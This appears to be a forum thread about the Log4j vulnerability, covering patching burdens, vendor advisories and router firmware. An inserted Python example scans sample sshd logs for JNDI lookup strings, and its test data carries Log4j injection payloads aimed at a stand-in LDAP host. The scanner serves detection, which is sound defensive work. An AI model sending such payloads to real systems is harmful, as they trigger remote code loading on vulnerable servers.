I don’t know how popular it is but Java ME came out something like 20 years ago and could run on devices like pagers and pocket dictionaries, just fine. I would assume that modern routers are at or above that level of hardware by this point.
Ultimately, there aren’t that many people who can code C and C++ at all, let alone write optimal C/C++ code. It’s cheaper and easier for most companies to have one or two low-level engineers who get the platform running, and put ME on top of it. After that’s done, you can hand it over to some 18-year-old who can barely implement fizz-buzz, and let him code whatever else the business wants in Java.
Java ME is what I was talking about with the cell phones. I guess that makes sense.
But the hardware I’ve had definitely seems underpowered. The webserver for one would time out like crazy if the router was doing anything else. And, as I said, the new one is just incredibly slow. It just seems to me like it would make more sense to use “off the shelf” open source web servers that were already built in lower level languages.
Lots of scrambling at work – luckily none of the code I am responsible for uses log4j. One of the pieces is on top of something that uses log4j, but not the vulnerable version.
I now have customers yelling about Azure services being vulnerable even though both Microsoft and Databricks say they aren’t vulnerable and, being PaaS, we have no ability to remediate or even confirm if Log4j is in the underlying distro. Microsoft has a very small list of potentially vulnerable services, but not with the clients in question.
Multiple internal tools that my company uses were found to have vulnerabilities from Log4j, but fortunately the application I directly work on is not one of them. However, the repository that holds my team’s code, as well as another platform that hosts our compiled code modules and other libraries our code depends upon, were found to be affected, and other teams are actively working on patching them as we speak.
That’s mostly correct. It’s just that the internet-facing systems that use Java and this library are most immediately susceptible to attack…
But really any Java-based application using the library has a severe chink in its armor…which could extend to anything else on a machine, if it were compromised, and the attacker elevated their privilege on that machine. Logging is a pretty common requirement for applications.
For us, it’s been a week of patching…only to get another email from a vendor saying ‘the first remediation may not be quite enough.’
67+ applications based on 27 or so internal libraries all impacted - plus about 15 or so purchased and installed applications (including ESRI ArcGIS Enterprise). Senior programmers working insane hours since last Friday, emergency deployments, etc.
Our frigging kickstarter had Log4j included. That has now been remediated.
Yeah, it’s a big deal. The best analogy I’ve seen is that someone gives your housekeeper a big sealed box. They bring the box into your house and open it with no clue what’s inside.
I just saw some logs from a customer where the log4j attack was being thrown at sshd in the hopes that sshd was logging via log4j (it wasn’t).
This is just another instance of not correctly handling uncontrolled data, but it also illustrates how poorly many sites manage network security - there should be no reason for a webserver inside your network to be allowed to make arbitrary LDAP connections to the internet, and not having a robust firewall policy to prevent that is negligent, in my opinion.
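The two posts above (the sshd logs being probed, and the point that the bug is really about untrusted input reaching a logger) are the kind of thing a defender checks for with a quick log scan. The following is an added example, not code from either poster: it scans constructed sshd-style auth log lines for JNDI lookup strings, which is what a Log4j-backed logger would have tried to resolve. The log lines, host names and addresses are constructed sample data, and the regular expressions are my assumptions.

```python
import re
from typing import Dict, List

# Constructed sample sshd log lines (not from the thread). Lines 3 and 4
# carry a JNDI lookup string in the attacker-controlled username field,
# which is exactly what a vulnerable Log4j logger would have resolved.
SAMPLE_LOG = """\
Dec 13 02:14:07 bastion sshd[2231]: Accepted publickey for deploy from 10.0.4.12 port 51022 ssh2
Dec 13 02:14:09 bastion sshd[2235]: Failed password for invalid user admin from 198.51.100.7 port 40122 ssh2
Dec 13 02:14:11 bastion sshd[2238]: Invalid user ${jndi:ldap://198.51.100.7:1389/a} from 198.51.100.7 port 40130
Dec 13 02:14:12 bastion sshd[2240]: Invalid user ${JNDI:LDAPS://198.51.100.7/x} from 198.51.100.7 port 40131
"""

# A JNDI lookup string: "${", optional whitespace, "jndi", a colon, then a
# scheme name. Matched case-insensitively because the lookup itself is.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)", re.IGNORECASE)
# sshd's "from <ip> port <port>" suffix, used to attribute the source.
SRC_RE = re.compile(r"\bfrom (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)")


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that carries a JNDI lookup string."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = JNDI_RE.search(line)
        if not m:
            continue
        src = SRC_RE.search(line)
        findings.append({
            "line": lineno,
            "scheme": m.group("scheme").lower(),
            "src_ip": src.group("ip") if src else "",
            "src_port": int(src.group("port")) if src else 0,
        })
    return findings


def source_ips(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct source addresses seen sending lookup strings, for blocking or triage."""
    return sorted({str(f["src_ip"]) for f in findings if f["src_ip"]})


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("sources:", source_ips(hits))
```

The same scan applies to any service log that accepts attacker-chosen strings (web access logs, mail headers), and a hit in a log written by a non-Java daemon like sshd tells you someone is probing, not that the host was affected.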
The easiest way to check/test is to log into your router, go to the admin page and check for firmware upgrades. If there is one, install it. That would be your solution if your router were vulnerable and staying current with firmware is generally considered a best practices operation in any event.
ETA: We got an FYSA email last week that several hundred servers/apps were patched and monitoring is ongoing for anything that was overlooked. Not within my scope of responsibilities so no details. Just reassuring me so I can reassure anyone who asks.